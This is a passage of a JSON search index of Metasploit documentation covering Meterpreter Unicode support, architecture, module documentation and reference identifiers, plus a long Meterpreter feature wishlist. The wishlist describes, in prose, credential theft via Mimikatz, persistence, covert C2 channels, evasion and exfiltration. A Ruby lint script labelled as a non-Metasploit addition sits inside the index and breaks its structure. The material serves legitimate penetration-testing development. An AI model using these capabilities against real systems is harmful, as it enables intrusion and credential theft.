    "content": "Until recently (April 2015), Meterpreter always sent string data in whatever the system encoding happened to be. With the TLV protocol, the TLV_TYPE_STRING was treated roughly as a plain C byte array, with no real expectations as to how the data should be decoded on the Meterpreter or Metasploit framework sides. As a result, type confusion occurred between different locales on remote machines and the local console. To avoid corrupting the terminal due to mistaken character encoding interpretations, Metasploit framework implements a Unicode filter that converts any possibly unprintable characters into hex strings. While this allows a sufficiently-advanced human to eyeball a string for meaning, it makes dealing with Unicode strings awkward. To solve the problem, TLV_TYPE_STRING has been retroactively declared to mean UTF-8 encoding only. All Meterpreter implementations should send UTF-8 strings and expect them in requests. On Windows systems, this means that Meterpreter needs to convert to and from Windows’ UTF-16LE implementation. So far, the Filesystem operations on all Meterpreters have been converted to expect and send UTF-8 strings. Only the PHP meterpreter on Windows lacks Unicode support, due to limitations in PHP itself. All new TLVs should send and receive UTF-8. There is still functionality that needs conversion beyond the Filesystem APIs, and these can be loosely discovered with a command like grep -R A\\( * to find all ASCII variants of functions called by meterpreter. In the Windows C meterpreter, there are a couple of helper functions to simplify the conversion work: . wchar_t *utf8_to_wchar(const char *in); char *wchar_to_utf8(const wchar_t *in); . These functions both allocate a new string as their return value, so the strings should be freed after use by the caller. Here is an example of a function expanding a path and performing the conversion to and from UTF-8: . 
char * fs_expand_path(const char *regular) { wchar_t expanded_path[FS_MAX_PATH]; wchar_t *regular_w; regular_w = utf8_to_wchar(regular); if (regular_w == NULL) { return NULL; } if (ExpandEnvironmentStringsW(regular_w, expanded_path, FS_MAX_PATH) == 0) { free(regular_w); return NULL; } free(regular_w); return wchar_to_utf8(expanded_path); } . Unicode support in Metasploit framework today is enabled by default on Linux/Unix systems, since most modern terminal emulators have no trouble displaying the characters. However, on Windows, most native terminal emulators ironically have trouble working with more than one language at once, due to historical code page support. So, for Windows, Unicode characters are still filtered by default. Setting EnableUnicodeEncoding to false will allow the native characters to be emitted by the Metasploit console. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-unicode-support.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-unicode-support.html"
  },"651": {
    "doc": "Wishlist",
    "title": "Wishlist",
    "content": "This document is our live wishlist of features and changes for the Metasploit Meterpreter payloads. The majority of this list came from a survey sent out to the community in early 2015. If you plan to work on one of these features, please add a note to the item, and reference any open tickets or pull requests that are relevant. This document only contains survey suggestions that were specific to Meterpreter. Duplicate and similar items have been combined. Items currently in development have been marked [IN PROGRESS] . Items landed in master have been marked [DONE] . Related open tickets (slightly broader than Meterpreter): . | [DONE] Make User-Agent easier to control across modules and more consistent | [IN PROGRESS] Comprehensively refactor Windows reverse_http stagers | [DONE] Python reverse HTTPS stager | [DONE] Port windows reverse_tcp & bind_tcp to Metasm. Was later found to be implemented in https://github.com/rapid7/metasploit-framework/pull/5214. | . Meterpreter Platform Support . | Mac Meterpreter | iOS Meterpreter | PHP Meterpreter should have equivalent functionality to Win32 | Python Meterpreter should have equivalent functionality to Win32 | POSIX Meterpreter should have equivalent functionality to Win32 (extract it from Win32 codebase) | Powershell Meterpreter | Some users indicated that the Python/PHP Meterpreters were important because the POSIX/Linux Meterpreter was not working for them | . Mimikatz Integration . 
| In-memory pass-the-hash (basically this runs a process as “netonly” I believe, then injects real credential hashes supplied by the user in order to perform network based auth to things with only a hash) | Exporting of certificates, keys, and tickets in base64 format (already supported) then down to real files on disk for the attacker info | Add on-target minidump extraction | Add sekurlsa::searchpasswords | Expand Mimikatz and contribute back to it | Integration of Mimikatz with the credential database | Latest version of Mimikatz to be used as the plugin | It would be great to have a method to generate a golden ticket for a specific period of time (month, 6-months, year) rather than only 10 years. | . Meterpreter Pivoting . | VPN Pivoting for Framework (WinPcap still better than nothing) | Reverse pivoting from the target machine back to the attacker (TCP/UDP) . For many years I’ve asked for this feature. Basically Meterpreter needs to be able to say, listen on port 8080 on victim 1 and it go through the Meterpreter session to port whatever (9060) on the attacker’s machine or a designated alternate IP. Then, whenever someone hits that port it’s auto forwarded through the session. This could help out a lot for SMB capture, post exploitation phishing, and other things like setting a user’s proxy to use your forwarded port instead of the corporate proxy. | Improved pivoting speed and latency | Pivoting that is reliable and works well with different transports. In particular, I want the ability to pivot one session through another even if the first session is reverse_tcp or reverse_https, regardless of the second session’s transport. This will be difficult without installing drivers, but I would like several useful, working transports that I know I can pivot reliably with. | Carry portforwards and other channels along with a migrate. | . Privilege Escalation . 
| Allow privilege escalation modules to increase the privileges of the current session instead of firing off a new session. | Automated privesc for all platforms - not just Windows. | Implement a “privup” command that is similar to getsystem which automatically tries to get higher privs using local exploits. Allow the user to specify a “force” flag to automatically try “dangerous” privilege escalations (kernel mode, etc) | Make the “local” modules more seamlessly accessible inside Meterpreter without requiring sending your session to background and running a local module separately against it. Would be nice to have a built-in Meterpreter command called “local” with tab complete that would list the local modules relevant to that platform/arch - then running one of the local modules auto selects your current session, spawns a new Meterpreter session and transfers you over to that session automatically if successful with a clear message/indication that you’re now in a new elevated Meterpreter session. | . Remote File Access . | [DONE] Console/Meterpreter: Support for uploading, downloading, deleting, renaming, and listing files using UTF-8 input and showing UTF-8 output, converting this in the Meterpreter payload as necessary to support accessing unicode paths on the target. | [DONE] Console: The ls command should support wildcards in the directory listing, ex: ls *.csv | [DONE] Console: The ls command should support sorting files by date, name, or size | [DONE] Console: The ls command should support listing MSDOS 8.3 (short) names if available on Windows | [DONE] Console: The download command should support filtering files based on a wildcard match (recursively, too) | [DONE] Console: The download command should support mirroring an entire remote file system to a local directory (names, paths, and timestamps) | . Meterpreter Features . 
| Direct Powershell integration on Windows (load & run .NET runtimes from inside Meterpreter) | Remote (target-side) scripting | Builtin userland persistence | Builtin rootkit/bootkit payload persistence | Create payloads that only “install” on specific computers (based on hardware, windows domain, etc) | Acquire a physical RAM image without touching the disk. This currently requires uploading winpmem[64].sys to windows\\system32 and invoking it through post/windows/manage/driver_loader. As loaded winpmem.sys exposes the RAM as disk device I can then suck it through post/windows/manage/nbd_server. Please make this possible without dropping winpmem.sys to system32 folder if possible | Manage multiple Meterpreter processes as one session as described in #4715. Many times there have been situations where a keyscan, or sniffer was going and something else occurred that required migration or cancelling to perform an action. “Installing” jobs in processes less likely to die would allow a pentester to still move around as needed but also be able to have persistent tasks going. A pipe dream of this feature would be to install a “rev2system” jobs whereby I could migrate to a low priv status for accessing Cryptolib encrypted storage but also get back to SYSTEM when I’m done without needing to pop a shell again. Another pipe dream here would be to also have jobs that if the user logged out, then back in the next day and I had a shell come back then, I could re-attach to my running jobs and get their results . | PrependTokenSteal / PrependEnvironmentSteal: Basically with proxies and other perimeter defenses being SYSTEM doesn’t work well. This would be an addition to a payload that would work to execute as SYSTEM but would then locate a logged in user and steal their environment to call back to the handler. 
Very useful when pivoting around with PSEXEC | Binary installed death dates: A way of putting a date in a binary where after that date the binary no longer functions would be useful and possibly even perform self-deletion. Time zones would be a tricky matter, but is something handled by many programmers already (probably just not in shellcode) | Allow Meterpreter sessions to resolve L3 addresses (#4793) | Track whether or not the current session has admin credentials (#4633) | Support Metasploit-side zlib compression of sessions | Being able to use Meterpreter instances to easily forward commands & exfil | Automatic cleanup and removal of session and any recorded persistence after predetermined amount of time (server-side) | Change desktop/phone background | Remote mouse control | Play sound on the remote system | Read words out loud via text to speech on the remote system | Volume control | RSS feed from reverse_http(s) multi-handler that I can connect a RSS reader to (or something like IFTTT) and get notices when new sessions are created | MessageBox popups | Call the system “open” command easily (ShellExecute on windows, launch intent on Android) | Gather credentials from Google Chrome | LNK (binary) modification: Editing a LNK file’s ICON location (for SMB capturing), “Starting Directory” (for DLL injection) or target binary would make some post exploitation tasks easier | “Pinned” app modification: Knowing which apps are pinned, and what they link to (be it taskbar or start menu) would be useful intelligence, but also being able to modify the target of these links would be better and a very easy user-land persistence. (Run this && the real thing you want) | Remote Registry automation: Remotely editing or reading the registry of a remote system works currently (sometimes) but it has no smarts about if the Remote Registry service is on or not. 
It would be nice to automate the starting and stopping of the remote registry service as well as possibly warning the user if they are attempting to do this as SYSTEM (probably going to fail). The use case for this is installing persistence on lots of systems quickly as well as reading user lists, MRUs and other intelligence important keys. (like finding a system with the PuTTY keys) | “ps” and “kill” for remote systems: This would remove the need to drop to a shell and attempt to remember how to format “taskkill” and “tasklist”’s argument list. Tasklist also automatically removes the IPC$ connection after it’s done so results in some annoying disconnected share viewing | Scheduled Tasks / AT: Many of the ways to pivot or stay persistent use AT or Scheduled Tasks, to do so. This functionality to do tasks both locally and on remote hosts would greatly decrease the number of times a pentester would need to drop to cmd.exe | [DONE] Execute with login credentials: When a user is no longer online it is overkill to PSEXEC (which would just net a SYSTEM shell anyways with MSF) and “RunAs” isn’t supported since it requires a password at a prompt, so adding a simple CreateProcessWithLogon feature would help with reviving dead tokens #4649 | ListDrives: Most of the time shares and other drives rather than just C:\\ are where important files are stored. This feature would list local storage (plus USB) and network storage (SMB connected drives with where they are connected from and as what user) to start, but this feature would need to grow to support “Cloud” drives as well, like Dropbox, Box, Google Drive, and SkyDrive. | Enumerables support in Railgun: Windows is full of “Enumerables” like EnumWindows that would be nice to have the ability to create code for. 
That example is bad since ExtAPI has EnumWindows now but the argument doesn’t go away for railgun | DACL / Permissions enumeration: This is just needed in general for privilege escalation enumeration, share permissions, and reporting (“Why did you have access to this share, it was only supposed to be for X”) | Gina/SSP support: This would probably need to be an injected “job” but the basic premise is an in-memory load of a SSP or inject into Gina so when a new login happens against the system a set of clear text credentials are captured. Two extremely useful cases would be on a terminal server, or a server that no one is logged into at the time of infection due to time zone or operating hour differences | Websnapshot: Currently there isn’t a way to weed out web applications once in a network. This feature would, using IE, or another method be able to generate a screenshot of what a page looks like in a browser (given a PROTOCOL/URL/PORT). Biggest requirement is auto-accepting any self signed SSL certs and showing when authentication is required. | On-target resource cloning: Allowing a pentester to drop a binary and clone the ICON (in particular) of a binary would add to the stealthiness of an operation and add attack opportunities that weren’t previously thought plausible | Scatterbomb: Persistence is difficult, and making sure your session doesn’t die because you chose the wrong process to migrate into or the user exited that process because the PDF looked hung. This would work by attempting OpenProcess on every process or a select list of processes and inject Meterpreter threads into them. But it would rely on the Mutex feature so that only one would be calling back at a time. 
Basically allowing for a resilient semi-persistent Meterpreter session that would save you from yourself when you accidentally type exit on the Meterpreter> prompt instead of your other terminal | Mutex checking binary exports: This follows up with the scatterbomb but essentially when installing persistence as a pentester I only install one because installing more than one would raise the noise level of a compromised host. If the binary/callback would check a mutex before doing anything and looping based on a timeout that would be even better. | OLE / Office Controls: This is basically an open ended feature request asking for support for Office, mostly Outlook (like read newest emails, search email, etc). | Configurable character set conversion for Shell sessions and channels. When spawning a windows shell from meterpreter, on a host that uses a German version of windows, all the special characters (e.g. öäü) are broken, i.e. they are either not rendered at all, or replaced with that default “character not found” unicode character. Forcing the terminal emulator to use cp850 made it work for now. | . Meterpreter Stager Support . | [DONE] Network error tolerant versions of existing stagers | [DONE] Tagged stagers that send the payload type, arch, platform during the staging process to enable shared listeners | [DONE] Stagers that contain an embedded unique ID that can be used to identify which payload triggered what session | [DONE] Stagers that are “stageless” for Meterpreter (include the entire main Meterpreter payload, plus any required extensions). In situations of high network latency or extreme network detection a non-staged exe is the only way to go. Ulta-met is a project that does this but isn’t as stable or easy to work with as if it were just built into the binary creation options. | [DONE] Stagers that are “stageless” for Meterpreter and include all potential functionality (all extensions) | . Meterpreter Transport Flexibility . 
| [DONE] Support for changing the transport (host, port, URL) of a live session to a new endpoint or protocol | [DONE] Support for multiple transports for the initial session, using the first transport that works | [DONE] Support for multiple endpoints across multiple transports for the initial session | [DONE] Support for automatic switching between multiple transports while the session is running | [DONE] Support for user-configured callback frequency and endpoint rotation | Support for Tor tunneling to .onion and internet-facing listeners | Support for time-based callback, such as limiting callbacks to certain times of the day. | Support for P2P style callbacks. Gossip protocol to find other Meterpreters on the network and use them as exfiltration point. This callback would reduce the amount of endpoints that would call “out” to a handler to 1. Whoever the “master” was. All comms would automatically (because, math) find and delegate this master and finally send through the master all of their comms. This could happen over a named pipe, or a forwarded port or something. (DHT?) | Support for DNS A/TXT transports | Support for UDP transports | Support for ICMP transports | Support for TLS encrypted bind listeners | Support for HTTP application listener (ie CGI mode Meterpreter session, tomcat servlets, etc) | Support for third-party communication transports (Github, Twitter, pastebin, etc) | Support for XMPP transports. Many organizations use IM and chat clients internally and support them going outbound. reverse_tcp being stopped for the most part these days and more and more catching reverse_http(s) due to proxies, this might become the next outlet. Possibly using servers that are already established in the industry ;-) but mainly supporting XYZ jabber server as a pass through. This would probably be a very big piece of shellcode as I don’t believe any Windows OSs support XMPP out of the box. 
| Support for IE callback: One method deployed by some more infamous malware is to only communicate when IE is running and surfing and only by hooking IE to send comms. This callback would operate very much the same and would support any kind of proxy by default as IE does. | Support for Outlook callback: This callback would use email back and forth either directly to a MSF run SMTP server or through other services, but the C2 channel would be locally (not on the exchange filter system) auto-filtered to a non-visible folder (using PidTagAttributeHidden). This type of comms would greatly increase the lag time supported in Meterpreter simply due to the inherent lag in email. | . Meterpreter HTTP Transport Options . | [DONE] Create a whitelist of allowed URLs on the handler, have these persistent between metasploit runs | [DONE] Indicate whether a given handler should silently accept, accept and report, or drop connections using unregistered URLs | [DONE] Whitelisted URLs should be referenced using an alias, stored persistently with the URL | [DONE] Session listing output should indicate what URL and URL alias a particular session is associated with | [DONE] URLs can be anywhere from 30 to 128 bytes long | . Meterpreter Proxy Support . | [DONE] Use Windows Credentials with NTLM Authentication to connect via System Proxy back to attacker | If Meterpreter executes as system - option to find a user, and use that user’s proxy settings for comms (temporarily or cleanup on exit) - maybe something like RunAsCurrentUser | [DONE] Better proxy support and the ability to sleep. Still more to do on burstable updates | . Communication Protection . | Authenticated callbacks: This is pretty straightforward, when a pentester no longer controls the IP they were attacking from and failed to clean up every binary and phishing email there is a chance of compromise by proxy. 
The problem was somewhat solved with SessionExpirationTimeout and SessionCommunicationTimeout but both of them are loaded in the stage, not hard coded into any binary built, so it’s very easy to get into this situation. Authenticated callbacks would allow a pentester to add a small layer of protections if this event were to happen and a callback from a client was sent to an IP no longer in the pentester’s control | Embedded TLS cert or hash of cert to verify Meterpreter instance on the Metasploit side | [DONE] Embedded TLS cert or hash of cert to verify Metasploit instance on the Meterpreter side | Embedded password to verify Meterpreter instance on the Metasploit side (challenge-response) | Embedded password to verify Metasploit instance on the Meterpreter side (challenge-response) | [DONE] Enable TLS verification to verify Metasploit instance on the Meterpreter side | [DONE] Allow open, relaxed, strict modes of payload authentication (everything, everything but flag unauthorized, drop non-authorized) | . Communications Evasion . | Emulation of common web application traffic when using HTTP-based transports | Change web application traffic emulation fingerprints on the fly when using HTTP-based transports | [DONE] Sleeping for a specified period of time before reconnecting to Metasploit | [DONE] Automatic shutdown/cleanup after a specified amount of time has passed | Traffic shaping or malleable communications, especially for HTTP(S), can be very useful for blending in, or even for adversary simulation. See Maligno (OSS - http://www.encripto.no/tools/) | Malleable network signatures in general | Malleable file artefacts - Make Meterpreter look like PlugX / Poison Ivy / etc. 
| Stealthier network comms (C2 DLL inject into web browser) | Better support to automatically identify applications that use a corporate proxy that allows outside connections and then leverage this application’s features | Emulate various real world malware | Being able to use Meterpreter instances to easily forward commands & exfil | Supporting a set URI path for reverse_http(s), so you can use other webservers as a reverse proxy. | . Session Handlers . | [DONE] Generate a unique ID for each session (target-side) | [DONE] Generate a unique ID for each generated payload. Backdooring/Persisting on more than 10 machines over months it gets very difficult to know when a host hasn’t called back in a while or when a new host arrives. This would need not to be based on gateway, local IP, or any other transient information. This can be processed at any step as long as when STDAPI is loaded I can quickly identify if it’s a system that I’ve known about, and how long it’s been since I’ve seen it. | Shared listeners that can stage multiple payload architectures and platforms (using tags). Depends on new stagers and a new listener and unique IDs. [IN PROGRESS] | [DONE] Track the last time a given session checked in | Track user defined state data in the db, such as specific user / member of group logged in, specific shares open, certain tuple of IP:port in network connections (1.2.3.4 over 22 where 1.2.3.4 is an IP of interest) | Reconnecting payloads will have different IPs, take this into account for session methods (peerinfo/tunnelinfo, etc) | . Session Reliability . | [DONE] Metasploit payloads should always restore connections if there is a network error unless the user explicitly kills the session | Improve reliability, encryption, authentication. Better integration for custom payloads. 
| Spawn a new session before running a module that could crash the current session (mostly privilege escalation, but some buggy post modules too [railgun]) | Meterpreter should work robustly in a VM, on a cloud server, or through corp proxies | . Android Meterpreter Features . | Android gather modules for auth tokens & sqlite databases (call logs, contacts, email, etc) | [DONE] Android lock screen removal | Crack the lock screen hash to reveal the password, pin code or gesture | Remote screen control | Add record_mic_stream (trigger based on event, like phone call) | [DONE] Grab photos from front and rear cameras | Android desktop background, sound play, vibrate, screenshot | [DONE] Quickly grab GPS coordinates | Windows post module to install Meterpreter on any attached android devices | Better pivoting (e.g. bridging between WiFi and 4g) | More root exploits | Dump browsing history and cookies | Comprehensive test suite (including rspec) | ARM/POSIX Meterpreter | [DONE] Support for native payloads in the addJavascriptInterface exploit | . Payload Generation . | Msfvenom should support injecting into existing APKs for Android Meterpreter deployment. Otherwise, it’s just an app the target installs for 10 seconds and removes after confirming it has no user interface, barely allowing the Meterpreter session to be created. [IN PROGRESS] | Msfvenom really needs to spit out some C# payloads. You can pretty easily modify some of the powershell ones to be C#, but there really ought to be a built in C# payload. | [DONE] Generated payloads should default to exiting the process when the shellcode completes | [DONE] Payload generation should allow named UUIDs to be injected into payloads | . Unit testing for payloads . | Metasploit payload classes should have specs, new specs should be created when any class is changed if there isn’t an existing spec. 
| Metasploit payload tests that can run in Github Actions, should be automatically tested end-to-end | Metasploit payload tests that can’t run in GitHub Actions should be run by Jenkins and target a virtual machine (local or cloud-hosted). | Meterpreter payloads should test every advertised console command. | Meterpreter payloads should test a subset of the full APIs available. | . Meterpreter Specifications . | These define compatibility, quality, and order of preference for Meterpreter payload modules, including stagers and stages. | Payload Flags (for matching with exploits/generators/handlers): . | Supports SSL | Supports ZLIB | Staged / Unstaged | . | Quality Rank (for prioritizing bugs/feature work): . | Leverage using Rank system | Windows: Excellent | Python: Great | Java: Good | PHP: Normal | POSIX: Normal | . | Capabilities (queried post-stage to determine features): . | Filesystem | Registry | Pivoting (sockets) | Pivoting (vpn) | Process listing, kill, execute | Process memory read, write, injection | Migration | . | . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-wishlist.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-wishlist.html"
  },"652": {
    "doc": "Overview",
    "title": "Architecture",
    "content": "To avoid confusion, the victim running meterpreter is always called the server and the ruby side controlling it is always called the client, regardless of the direction of the network transport connection. The Meterpreter server is broken into several pieces: . | metsrv.dll and meterpreter.{jar,php,py} - this is the heart of meterpreter where the protocol and extension systems are implemented. | ext_server_stdapi.{dll,jar,php,py} - this extension implements most of the commands familiar to users. | ext_server_*.{dll,jar,php,py} - other extensions provide further functionality and can be specific to particular environments. | . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter.html#architecture",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter.html#architecture"
  },"653": {
    "doc": "Overview",
    "title": "Delivering Meterpreter",
    "content": ". | Using a technique developed by Stephen Fewer called Reflective DLL Injection (RDI), metsrv.dll’s header is modified to be usable as shellcode. From there, Metasploit can embed it in an executable or run it via an exploit like any other shellcode. | . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter.html#delivering-meterpreter",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter.html#delivering-meterpreter"
  },"654": {
    "doc": "Overview",
    "title": "Overview",
    "content": "Meterpreter is an advanced payload that has been part of Metasploit since 2004. Originally written in C by Matt “skape” Miller, dozens of contributors have provided additional code, including implementations in PHP, Python, and Java. The payload continues to be frequently updated as part of Metasploit development. Meterpreter development occurs in the metasploit-payloads repository and the compiled results are published as part of the metasploit-payloads gem. For a detailed understanding of the Meterpreter architecture, please review the original specification. Additional documentation about Meterpreter can be found on this wiki: . | Meterpreter Reliable Network Communication | Meterpreter Transport Control | Meterpreter HTTP Communication | Meterpreter Timeout Control | Meterpreter Sleep Control | Meterpreter Stageless Mode | Meterpreter Unicode Support | Meterpreter Configuration | Payload UUID | . Extension-specific documentation: . | Python Extension | Powershell Extension | . A wishlist of features is maintained at the Meterpreter Wishlist page. Examples of specific use cases can also be found on this wiki: . | Meterpreter Paranoid Mode | . Those interested in the technical details of Meterpreter, along with rationale behind some of the implementations, should read the following: . | The ins and outs of HTTP and HTTPS communications in Meterpreter and Metasploit Stagers | . Got dead Meterpreter sessions? Read this: Debugging Dead Meterpreter Sessions. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter.html"
  },"655": {
    "doc": "Module Documentation",
    "title": "Module Documentation",
    "content": "You can now generate documentation for modules on the fly using the info -d command. Module documentation allows you to see the help for a particular module from a web page, instead of from the command line. The help page includes: . | The PR history related to a particular module, if you have a GitHub access token set up. | The basic usage instructions for a module. | The advanced usage instructions for a module, if it’s available. | . How to use it . After you load a module, you can type info -d to generate a help page that provides basic usage information and displays the PR history for the module. msf> use auxiliary/scanner/smb/smb_login msf (smb_login)> info -d . Additionally, if it’s available, the help page will also include a KB that contains advanced usage information, such as vulnerable target details, caveats, and sample usage. The content in the KB is contained in a markdown file in the metasploit-framework/documentation/modules directory. Its purpose is to provide supplemental information that is outside of the scope of general documentation. Add an access token to see PR history . In order for you to be able to view the PR history for a module, you’ll need to add your GitHub access token to the environment variable GITHUB_OAUTH_TOKEN=\"<your token here>\" in .bash_profile. To generate a GitHub access token, check out this page. The token will need to have a scope for repos. How you can write KBs . Generally, the person who creates the module will write the initial KB for it, but anyone can write or contribute to it. Before you write a KB, you should take a look at the sample template, module_doc_template.md, or take a look at any of the KBs that are already available. To write a KB, you’ll need to: . | Create a markdown (.md) file. | Write the content. | Save the file and name it after the module name. For example, the filename for ms08_067_netapi.rb is called ms08_067_netapi.md. 
| Place it in the metasploit-framework/documentation/modules directory as directed below. | . Where to put the KB files . If you go to metasploit-framework/documentation/modules, you’ll see that there are documentation directories for each module type: auxiliary, exploit, payload, and post. To figure out where you need to put the file, you’ll need to look at the module name. | Start msfconsole. | Type use <module name>. | Type info. | When the module name appears, look at the Module field. You’ll see a file path for the module. That’s the path where the KB needs to be added. | . For example: . msf> use auxiliary/scanner/smb/smb_login msf (smb_login)> info Name: SMB Login Check Scanner Module: auxiliary/scanner/smb/smb_login .... If you were creating a KB for the SMB login scanner, you’d add it to metasploit-framework/documentation/modules/auxiliary/scanner/smb. Sections you should include in the KB . These are just suggestions, but it’d be nice if the KB had these sections: . | Vulnerable Applications - Tells users what targets (version numbers) are vulnerable to the module and provides instructions on how to access vulnerable targets for testing. If possible, provide a download link and any setup instructions to configure the software appropriately. | Verification Steps - Tells users how to use the module and what the expected results are from running the module. | Options - Provides descriptions of all the options that can be run with the module. Additionally, clearly identify the options that are required. | Scenarios - Provides sample usage and describes caveats that the user may need to be aware of when running the module. Include the version number and OS so that this setup can be replicated at a later date. | . ",
    "url": "/docs/using-metasploit/basics/module-documentation.html",
    "relUrl": "/docs/using-metasploit/basics/module-documentation.html"
  },"656": {
    "doc": "Module Reference Identifiers",
    "title": "On this page",
    "content": ". | List of supported reference identifiers | Code example of references in a module | . A reference in a Metasploit module is a source of information related to the module: a link to the vulnerability advisory, a news article, a blog post about a specific technique the module uses, a specific tweet, and so on. The more references you provide, the better, but do not use them as a form of advertisement. ",
    "url": "/docs/development/developing-modules/module-metadata/module-reference-identifiers.html#on-this-page",
    "relUrl": "/docs/development/developing-modules/module-metadata/module-reference-identifiers.html#on-this-page"
  },"657": {
    "doc": "Module Reference Identifiers",
    "title": "List of supported reference identifiers",
    "content": "| ID | Source | Code Example | . | CVE | cvedetails.com | ['CVE', '2014-9999'] | . | CWE | cwe.mitre.org | ['CWE', '90'] | . | BID | securityfocus.com | ['BID', '1234'] | . | MSB | technet.microsoft.com | ['MSB', 'MS13-055'] | . | EDB | exploit-db.com | ['EDB', '1337'] | . | US-CERT-VU | kb.cert.org | ['US-CERT-VU', '800113'] | . | ZDI | zerodayinitiative.com | ['ZDI', '10-123'] | . | WPVDB | wpvulndb.com | ['WPVDB', '7615'] | . | PACKETSTORM | packetstormsecurity.com | ['PACKETSTORM', '132721'] | . | URL | anything | ['URL', 'http://example.com/blog.php?id=123'] | . | AKA (deprecated*) | anything | ['AKA', 'shellshock'] | . *Good to know: AKA names for modules are no longer stored as a reference identifier, but in the Notes metadata field, as shown in the code example below. Each entry is a two-element array of identifier and value, and the value is the bare identifier as the examples show (a CVE is written '2014-9999', not 'CVE-2014-9999'). ",
    "url": "/docs/development/developing-modules/module-metadata/module-reference-identifiers.html#list-of-supported-reference-identifiers",
    "relUrl": "/docs/development/developing-modules/module-metadata/module-reference-identifiers.html#list-of-supported-reference-identifiers"
  },"658": {
    "doc": "Module Reference Identifiers",
    "title": "Code example of references in a module",
    "content": "class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Code Example',
        'Description' => %q{
          This is an example of a module using references
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'Unknown' ],
        'References' => [
          [ 'CVE', '2014-9999' ],
          [ 'BID', '1234' ],
          [ 'URL', 'http://example.com/blog.php?id=123' ]
        ],
        'Platform' => 'win',
        'Targets' => [
          [ 'Example', { 'Ret' => 0x41414141 } ]
        ],
        'Payload' => { 'BadChars' => \"\\x00\" },
        'Privileged' => false,
        'DisclosureDate' => '2014-04-01',
        'DefaultTarget' => 0,
        'Notes' => { 'AKA' => [ 'shellshock' ] }
      )
    )
  end

  def exploit
    print_debug('Hello, world')
  end
end ",
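As an added example (not part of the Metasploit docs or code base), the following Ruby lints a module's References array against the identifier table in the previous section and moves deprecated AKA entries into the Notes field, the form the code example above uses. The value formats it enforces for CVE, MSB and URL follow the table's own examples; treating CWE, BID, EDB, US-CERT-VU and PACKETSTORM values as digits-only is this example's assumption, and the function names are invented here.

```ruby
# Added example, not Metasploit's own code: a small lint for a module's 'References'
# metadata, using the identifier list from the reference table.

# Identifiers the table lists as supported (AKA only so it can be flagged as deprecated).
SUPPORTED_REFS = %w[CVE CWE BID MSB EDB US-CERT-VU ZDI WPVDB PACKETSTORM URL AKA].freeze
# Assumption of this example: these identifiers take a purely numeric value.
NUMERIC_REFS   = %w[CWE BID EDB US-CERT-VU PACKETSTORM].freeze

# Returns an array of human-readable findings; an empty array means the references look fine.
def check_references(references)
  findings = []
  seen = {}

  references.each_with_index do |ref, i|
    unless ref.is_a?(Array) && ref.size == 2 && ref.all? { |x| x.is_a?(String) && !x.empty? }
      findings << "ref[#{i}]: expected [ctx_id, ctx_val] strings, got #{ref.inspect}"
      next
    end
    id, val = ref

    unless SUPPORTED_REFS.include?(id)
      findings << "ref[#{i}]: unsupported identifier #{id.inspect}"
      next
    end

    case id
    when 'CVE'
      # Bare year-number form, as in the table ('2014-9999'); the 'CVE-' prefix is a common paste error.
      findings << "ref[#{i}]: CVE value must be YYYY-NNNN without the 'CVE-' prefix, got #{val.inspect}" unless val.match?(/\A\d{4}-\d{4,}\z/)
    when 'MSB'
      findings << "ref[#{i}]: MSB value must look like MS13-055, got #{val.inspect}" unless val.match?(/\AMS\d{2}-\d{3}\z/)
    when 'URL'
      findings << "ref[#{i}]: URL must be an absolute http(s) URL, got #{val.inspect}" unless val.match?(%r{\Ahttps?://\S+\z})
    when 'AKA'
      findings << "ref[#{i}]: AKA is deprecated as a reference; move #{val.inspect} to Notes['AKA']"
    when *NUMERIC_REFS
      findings << "ref[#{i}]: #{id} value should be digits only, got #{val.inspect}" unless val.match?(/\A\d+\z/)
    end

    key = [id, val]
    findings << "ref[#{i}]: duplicate of #{key.inspect}" if seen[key]
    seen[key] = true
  end

  findings
end

# Moves any deprecated ['AKA', name] entries out of 'References' and into Notes['AKA'],
# the form the code example uses. Returns [references, notes] as new objects.
def migrate_aka(references, notes = {})
  aka  = references.select { |r| r.is_a?(Array) && r.first == 'AKA' }.map(&:last)
  kept = references.reject { |r| r.is_a?(Array) && r.first == 'AKA' }
  new_notes = notes.dup
  new_notes['AKA'] = ((notes['AKA'] || []) + aka).uniq unless aka.empty?
  [kept, new_notes]
end

if $PROGRAM_NAME == __FILE__
  # Constructed input: the code example's references plus a deprecated AKA entry.
  refs = [
    ['CVE', '2014-9999'],
    ['BID', '1234'],
    ['URL', 'http://example.com/blog.php?id=123'],
    ['AKA', 'shellshock']
  ]
  check_references(refs).each { |finding| puts finding }
  kept, notes = migrate_aka(refs)
  puts "References: #{kept.inspect}"
  puts "Notes: #{notes.inspect}"
end
```

A check like this belongs in a pre-commit hook or a spec alongside the module: it catches pasting 'CVE-2014-9999' with its prefix, pointing at an identifier the framework does not know, and duplicated references left over from copy-and-pasted modules.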
    "url": "/docs/development/developing-modules/module-metadata/module-reference-identifiers.html#code-example-of-references-in-a-module",
    "relUrl": "/docs/development/developing-modules/module-metadata/module-reference-identifiers.html#code-example-of-references-in-a-module"
  },"659": {
    "doc": "Module Reference Identifiers",
    "title": "Module Reference Identifiers",
    "content": " ",
    "url": "/docs/development/developing-modules/module-metadata/module-reference-identifiers.html",
    "relUrl": "/docs/development/developing-modules/module-metadata/module-reference-identifiers.html"
  },"660": {
    "doc": "Modules",
    "title": "Metasploit modules",
